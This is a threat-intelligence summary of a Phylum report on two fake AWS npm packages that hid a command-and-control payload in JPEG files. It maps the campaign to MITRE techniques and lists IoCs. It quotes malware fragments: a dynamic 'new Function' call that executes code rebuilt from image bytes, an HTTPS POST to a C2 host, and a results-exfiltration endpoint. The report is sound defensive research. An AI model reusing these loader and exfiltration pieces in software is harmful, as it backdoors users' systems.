Threat Research

Fake AWS Packages Ship Command and Control Malware In JPEG Files

Securonix

Phylum reported malicious npm packages concealing a command-and-control payload inside JPEG files. The campaign decodes and executes code from images, registers with a remote C2 server, and periodically fetches commands from that server. #Phylum #img-aws-s3-object-multipart-copy #legacyaws-s3-object-multipart-copy #85.208.108.29 #cloudconvert

Keypoints

  • The incident involves two npm packages that appear legitimate but contain hidden C2 capabilities (img-aws-s3-object-multipart-copy and legacyaws-s3-object-multipart-copy).
  • Malicious code updates index.js to load and execute a new script loadformat.js that hides payloads inside image files.
  • loadformat.js analyzes image bytes and reconstructs executable code when enough “valid” bytes are found, using image data to trigger actions on the victim system.
  • The payload can register with a remote C2 server, periodically fetch commands, and execute them, sending results back to the attacker.
  • The C2 server communications use HTTPS and point to 85.208.108.29, with command/registration endpoints and data exfiltration paths.
  • Malicious packages persisted on npm for nearly two days after discovery, highlighting detection and response gaps in open-source ecosystems.

MITRE Techniques

  • [T1027.001] Steganography – Payload is embedded in images; “After reading the image file from the disk, each byte is analyzed. Any bytes with a value between 32 and 126 are converted from Unicode values into a character and appended to the analyzepixels variable.”
  • [T1059.007] JavaScript – The malware constructs code in imagebyte/analyzePixels and uses a dynamic function to execute it; “const func = new Function(‘https’, ‘exec’, ‘os’, imagebyte); func(https, exec, os);”
  • [T1071.001] Application Layer Protocol: HTTPS – The malware communicates with C2 servers over HTTPS; “httpsOptions = { hostname: ‘cloudconvert.com’, path: ‘/image-converter’, method: ‘POST’ }” and registration/command endpoints are used.
  • [T1041] Exfiltration Over C2 Channel – Results are posted back to the attacker; “path’: ‘/post-result?clientId=’ + encodeURIComponent(clientInfo.name)”
  • [T1195] Supply Chain – Malicious packages appear in open-source npm registry and were available for analysis; “these packages appear to be legitimate” and “the malicious packages remained available on npm for nearly two days.”

Indicators of Compromise

  • [IP] C2 server – 85.208.108.29 – used for client registration and command retrieval
  • [Domain] C2/command channel – cloudconvert.com – used in image-processing code path
  • [File] Dropped/appearing images – logo1.jpg, logo2.jpg, logo3.jpg – used to extract and execute code
  • [File] Malicious npm packages – img-aws-s3-object-multipart-copy, legacyaws-s3-object-multipart-copy
  • [Endpoint] C2 interactions – /register, /get-command?clientId=, /post-result?clientId=

Read more: https://blog.phylum.io/fake-aws-packages-ship-command-and-control-malware-in-jpeg-files/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint